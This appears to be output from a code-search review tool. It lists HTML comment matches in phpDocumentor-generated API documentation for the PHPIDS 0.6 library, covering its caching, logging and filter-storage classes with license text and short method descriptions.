./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Database.php.html:5 (155/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Database.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Database.php.html:23 (156/257) OK | Dubious | Bad | Hide 
20-			|							<a href="#sec-includes">Includes</a>
21-												</div>
22-	<div class="info-box-body">	
23:		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">PHPIDS</p>
25-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
26-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Database.php.html:72 (157/257) OK | Dubious | Bad | Hide 
69-				|						<span class="disabled">Includes</span>
70-														</div>
71-		<div class="info-box-body">	
72:			<a name="_IDS/Log/Interface_php"><!-- --></a>
73-<div class="oddrow">
74-	
75-	<div>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Database.php.html:83 (158/257) OK | Dubious | Bad | Hide 
80-		</span>
81-	</div>
82-
83:	<!-- ========== Info from phpDoc block ========= -->
84-<p class="short-description">PHPIDS</p>
85-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
86-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage_Abstract.html:5 (159/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Filter_Storage_Abstract</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage_Abstract.html:25 (160/257) OK | Dubious | Bad | Hide 
22-						
23-					</div>
24-	<div class="info-box-body">
25:        		<!-- ========== Info from phpDoc block ========= -->
26-<p class="short-description">Abstract Filter Storage</p>
27-<p class="description"><p>Class to assure the systems API</p></p>
28-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage_Abstract.html:147 (161/257) OK | Dubious | Bad | Hide 
144-							
145-					</div>
146-		<div class="info-box-body">
147:			<a name="var$caching" id="$caching"><!-- --></A>
148-<div class="evenrow">
149-
150-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage_Abstract.html:158 (162/257) OK | Dubious | Bad | Hide 
155-		</span>
156-	</div>
157-
158:	<!-- ========== Info from phpDoc block ========= -->
159-	<ul class="tags">
160-				<li><span class="field">access:</span> protected</li>
161-			</ul>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage_Abstract.html:168 (163/257) OK | Dubious | Bad | Hide 
165-		
166-
167-</div>
168:<a name="var$filterPath" id="$filterPath"><!-- --></A>
169-<div class="oddrow">
170-
171-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage_Abstract.html:179 (164/257) OK | Dubious | Bad | Hide 
176-		</span>
177-	</div>
178-
179:	<!-- ========== Info from phpDoc block ========= -->
180-	<ul class="tags">
181-				<li><span class="field">access:</span> protected</li>
182-			</ul>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage_Abstract.html:206 (165/257) OK | Dubious | Bad | Hide 
203-		<div class="info-box-body">
204-			<A NAME='method_detail'></A>
205-
206:<a name="method__construct" id="__construct"><!-- --></a>
207-<div class="evenrow">
208-	
209-	<div class="method-header">
210-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">44</span>)
211-	</div> 
212-	
213:	<!-- ========== Info from phpDoc block ========= -->
214-<p class="short-description">Constructor</p>
215-	<ul class="tags">
216-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage_Abstract.html:235 (166/257) OK | Dubious | Bad | Hide 
232-		
233-			
234-	</div>
235:<a name="methodaddFilter" id="addFilter"><!-- --></a>
236-<div class="oddrow">
237-	
238-	<div class="method-header">
239-		<span class="method-title">addFilter</span> (line <span class="line-number">96</span>)
240-	</div> 
241-	
242:	<!-- ========== Info from phpDoc block ========= -->
243-<p class="short-description">Adds one particular filter</p>
244-	<ul class="tags">
245-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage_Abstract.html:264 (167/257) OK | Dubious | Bad | Hide 
261-		
262-			
263-	</div>
264:<a name="methodgetFilterSet" id="getFilterSet"><!-- --></a>
265-<div class="evenrow">
266-	
267-	<div class="method-header">
268-		<span class="method-title">getFilterSet</span> (line <span class="line-number">85</span>)
269-	</div> 
270-	
271:	<!-- ========== Info from phpDoc block ========= -->
272-<p class="short-description">Returns array containing all filters</p>
273-	<ul class="tags">
274-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter_Storage_Abstract.html:288 (168/257) OK | Dubious | Bad | Hide 
285-		
286-			
287-	</div>
288:<a name="methodsetFilterSet" id="setFilterSet"><!-- --></a>
289-<div class="oddrow">
290-	
291-	<div class="method-header">
292-		<span class="method-title">setFilterSet</span> (line <span class="line-number">71</span>)
293-	</div> 
294-	
295:	<!-- ========== Info from phpDoc block ========= -->
296-<p class="short-description">Sets filter array manually</p>
297-	<ul class="tags">
298-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Composite.php.html:5 (169/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Composite.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Composite.php.html:23 (170/257) OK | Dubious | Bad | Hide 
20-			|							<a href="#sec-includes">Includes</a>
21-												</div>
22-	<div class="info-box-body">	
23:		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">PHPIDS</p>
25-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
26-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Composite.php.html:72 (171/257) OK | Dubious | Bad | Hide 
69-				|						<span class="disabled">Includes</span>
70-														</div>
71-		<div class="info-box-body">	
72:			<a name="_IDS/Log/Interface_php"><!-- --></a>
73-<div class="evenrow">
74-	
75-	<div>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Composite.php.html:83 (172/257) OK | Dubious | Bad | Hide 
80-		</span>
81-	</div>
82-
83:	<!-- ========== Info from phpDoc block ========= -->
84-<p class="short-description">PHPIDS</p>
85-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
86-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Memcached.php.html:5 (173/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Memcached.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Memcached.php.html:23 (174/257) OK | Dubious | Bad | Hide 
20-			|							<a href="#sec-includes">Includes</a>
21-												</div>
22-	<div class="info-box-body">	
23:		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">PHPIDS</p>
25-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
26-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Memcached.php.html:72 (175/257) OK | Dubious | Bad | Hide 
69-				|						<span class="disabled">Includes</span>
70-														</div>
71-		<div class="info-box-body">	
72:			<a name="_IDS/Caching/Interface_php"><!-- --></a>
73-<div class="oddrow">
74-	
75-	<div>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Memcached.php.html:83 (176/257) OK | Dubious | Bad | Hide 
80-		</span>
81-	</div>
82-
83:	<!-- ========== Info from phpDoc block ========= -->
84-<p class="short-description">PHPIDS</p>
85-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
86-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Session.php.html:5 (177/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Session.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Session.php.html:23 (178/257) OK | Dubious | Bad | Hide 
20-			|							<a href="#sec-includes">Includes</a>
21-												</div>
22-	<div class="info-box-body">	
23:		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">PHPIDS</p>
25-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
26-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Session.php.html:72 (179/257) OK | Dubious | Bad | Hide 
69-				|						<span class="disabled">Includes</span>
70-														</div>
71-		<div class="info-box-body">	
72:			<a name="_IDS/Caching/Interface_php"><!-- --></a>
73-<div class="oddrow">
74-	
75-	<div>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Session.php.html:83 (180/257) OK | Dubious | Bad | Hide 
80-		</span>
81-	</div>
82-
83:	<!-- ========== Info from phpDoc block ========= -->
84-<p class="short-description">PHPIDS</p>
85-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
86-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Filter---Filter.php.html:5 (181/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Filter.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Filter---Filter.php.html:22 (182/257) OK | Dubious | Bad | Hide 
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS  Requirements: PHP5, SimpleXML</p>
24-<p class="description"><p>Copyright (c) 2007 PHPIDS group (http://php-ids.org)</p><p>This program is free software; you can redistribute it and/or modify  it under the terms of the GNU General Public License as published by  the Free Software Foundation; version 2 of the license.</p><p>This program is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the  GNU General Public License for more details.</p></p>
25-
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Interface.php.html:5 (183/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Interface.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Interface.php.html:22 (184/257) OK | Dubious | Bad | Hide 
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
25-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_File.html:5 (185/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Caching_File</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_File.html:28 (186/257) OK | Dubious | Bad | Hide 
25-            <ul>
26-                <li><a href="../PHPIDS/IDS_Caching_Interface.html">IDS_Caching_Interface</a></li>            </ul>
27-        </p>
28:        		<!-- ========== Info from phpDoc block ========= -->
29-<p class="short-description">File caching wrapper</p>
30-<p class="description"><p>This class inhabits functionality to get and set cache via a static flatfile.</p></p>
31-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_File.html:99 (187/257) OK | Dubious | Bad | Hide 
96-		</div>
97-		<div class="info-box-body">
98-			<A NAME='method_detail'></A>
99:<a name="methodgetInstance" id="getInstance"><!-- --></a>
100-<div class="oddrow">
101-	
102-	<div class="method-header">
103-		<span class="method-title">static method getInstance</span> (line <span class="line-number">113</span>)
104-	</div> 
105-	
106:	<!-- ========== Info from phpDoc block ========= -->
107-<p class="short-description">Returns an instance of this class</p>
108-	<ul class="tags">
109-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_File.html:133 (188/257) OK | Dubious | Bad | Hide 
130-			
131-	</div>
132-
133:<a name="method__construct" id="__construct"><!-- --></a>
134-<div class="evenrow">
135-	
136-	<div class="method-header">
137-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">91</span>)
138-	</div> 
139-	
140:	<!-- ========== Info from phpDoc block ========= -->
141-<p class="short-description">Constructor</p>
142-	<ul class="tags">
143-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_File.html:165 (189/257) OK | Dubious | Bad | Hide 
162-		
163-			
164-	</div>
165:<a name="methodgetCache" id="getCache"><!-- --></a>
166-<div class="oddrow">
167-	
168-	<div class="method-header">
169-		<span class="method-title">getCache</span> (line <span class="line-number">163</span>)
170-	</div> 
171-	
172:	<!-- ========== Info from phpDoc block ========= -->
173-<p class="short-description">Returns the cached data</p>
174-<p class="description"><p>Note that this method returns false if either type or file cache is  not set</p></p>
175-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_File.html:197 (190/257) OK | Dubious | Bad | Hide 
194-					</dl>
195-			
196-	</div>
197:<a name="methodsetCache" id="setCache"><!-- --></a>
198-<div class="evenrow">
199-	
200-	<div class="method-header">
201-		<span class="method-title">setCache</span> (line <span class="line-number">130</span>)
202-	</div> 
203-	
204:	<!-- ========== Info from phpDoc block ========= -->
205-<p class="short-description">Writes cache data into the file</p>
206-	<ul class="tags">
207-				<li><span class="field">throws:</span> Exception if cache file couldn't be created</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Interface.php.html:5 (191/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Interface.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Log---Interface.php.html:22 (192/257) OK | Dubious | Bad | Hide 
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
25-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Memcached.html:5 (193/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Caching_Memcached</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Memcached.html:28 (194/257) OK | Dubious | Bad | Hide 
25-            <ul>
26-                <li><a href="../PHPIDS/IDS_Caching_Interface.html">IDS_Caching_Interface</a></li>            </ul>
27-        </p>
28:        		<!-- ========== Info from phpDoc block ========= -->
29-<p class="short-description">File caching wrapper</p>
30-<p class="description"><p>This class inhabits functionality to get and set cache via memcached.</p></p>
31-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Memcached.html:99 (195/257) OK | Dubious | Bad | Hide 
96-		</div>
97-		<div class="info-box-body">
98-			<A NAME='method_detail'></A>
99:<a name="methodgetInstance" id="getInstance"><!-- --></a>
100-<div class="oddrow">
101-	
102-	<div class="method-header">
103-		<span class="method-title">static method getInstance</span> (line <span class="line-number">124</span>)
104-	</div> 
105-	
106:	<!-- ========== Info from phpDoc block ========= -->
107-<p class="short-description">Returns an instance of this class</p>
108-	<ul class="tags">
109-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Memcached.html:133 (196/257) OK | Dubious | Bad | Hide 
130-			
131-	</div>
132-
133:<a name="method__construct" id="__construct"><!-- --></a>
134-<div class="evenrow">
135-	
136-	<div class="method-header">
137-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">100</span>)
138-	</div> 
139-	
140:	<!-- ========== Info from phpDoc block ========= -->
141-<p class="short-description">Constructor</p>
142-	<ul class="tags">
143-				<li><span class="field">throws:</span> Exception if necessary files aren't writeable</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Memcached.html:166 (197/257) OK | Dubious | Bad | Hide 
163-		
164-			
165-	</div>
166:<a name="methodgetCache" id="getCache"><!-- --></a>
167-<div class="oddrow">
168-	
169-	<div class="method-header">
170-		<span class="method-title">getCache</span> (line <span class="line-number">172</span>)
171-	</div> 
172-	
173:	<!-- ========== Info from phpDoc block ========= -->
174-<p class="short-description">Returns the cached data</p>
175-<p class="description"><p>Note that this method returns false if either type or file cache is  not set</p></p>
176-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Memcached.html:198 (198/257) OK | Dubious | Bad | Hide 
195-					</dl>
196-			
197-	</div>
198:<a name="methodsetCache" id="setCache"><!-- --></a>
199-<div class="evenrow">
200-	
201-	<div class="method-header">
202-		<span class="method-title">setCache</span> (line <span class="line-number">142</span>)
203-	</div> 
204-	
205:	<!-- ========== Info from phpDoc block ========= -->
206-<p class="short-description">Writes cache data</p>
207-	<ul class="tags">
208-				<li><span class="field">throws:</span> Exception if necessary files aren't writeable</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Init.php.html:5 (199/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Init.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Init.php.html:22 (200/257) OK | Dubious | Bad | Hide 
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
25-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Session.html:5 (201/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Caching_Session</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Session.html:28 (202/257) OK | Dubious | Bad | Hide 
25-            <ul>
26-                <li><a href="../PHPIDS/IDS_Caching_Interface.html">IDS_Caching_Interface</a></li>            </ul>
27-        </p>
28:        		<!-- ========== Info from phpDoc block ========= -->
29-<p class="short-description">File caching wrapper</p>
30-<p class="description"><p>This class inhabits functionality to get and set cache via session.</p></p>
31-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Session.html:99 (203/257) OK | Dubious | Bad | Hide 
96-		</div>
97-		<div class="info-box-body">
98-			<A NAME='method_detail'></A>
99:<a name="methodgetInstance" id="getInstance"><!-- --></a>
100-<div class="oddrow">
101-	
102-	<div class="method-header">
103-		<span class="method-title">static method getInstance</span> (line <span class="line-number">98</span>)
104-	</div> 
105-	
106:	<!-- ========== Info from phpDoc block ========= -->
